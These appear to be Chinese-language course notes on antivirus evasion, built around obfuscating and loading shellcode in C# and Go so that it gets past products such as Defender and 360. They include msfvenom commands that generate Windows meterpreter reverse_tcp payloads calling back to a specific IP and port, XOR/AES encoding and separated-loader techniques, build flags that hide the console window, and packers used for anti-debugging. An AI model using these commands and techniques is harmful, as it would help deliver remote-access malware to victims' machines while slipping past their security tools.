知识点

#知识点：

1、C#-混淆&分离&反调试
2、GO-混淆&分离&反调试
3、成品程序-包含反调试VT

#章节点：

编译代码面-ShellCode-混淆
编译代码面-编辑执行器-编写
编译代码面-分离加载器-编写
程序文件面-特征码定位-修改
程序文件面-加壳花指令-资源
代码加载面-Dll反射劫持-加载
权限逻辑面-杀毒进程干扰-结束
工具数据面-通讯内存流量-动态

对抗目标：
X60 Defender 某绒 管家 VT等

编程语言：
C/C++ Python C# Go Powershell Ruby Java ASM等

涉及技术：
ShellCode混淆加密，无文件落地，分离拆分，白名单，DLL加载，Syscall，加壳加花，
资源修改，特征修改，二次开发CS，内存休眠，进程注入，反沙盒，反调试，CDN解析等

演示案例

1、C#&NET-ShellCode-原型&混淆

2、GO-ShellCode-原型&混淆&分离

3、C#&GO-成品程序-保护反调试VT

.NET

1、原型
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=6688 -e x86/shikata_ga_nai -i 15 -f csharp
2、混淆
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=6688 -f csharp
3、文件混淆-反调试VT
开源-ConfuserEx
付费-VirboxProtector

Golang

-运行1.go脚本
go run 1.go
-编译1.go脚本
go build 1.go
-没有弹窗的exe命令编译：
go build -ldflags="-H windowsgui -w -s" 1.go

1、Golang-Shellcode编译-1.go

2、Golang-编码加密-Xor&Aes混淆-2&3.go
Xor Aes Base64 参数提交

3、Golang-分离式加载器-参数&资源-4&5.go
加上去特征&参数分离
cs或msf生成raw格式-4.go
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=6688 -f hex
go build -ldflags "-s -w -H=windowsgui" 5.go

4、Golang-保护混淆反调试器-通用
SafengineShielden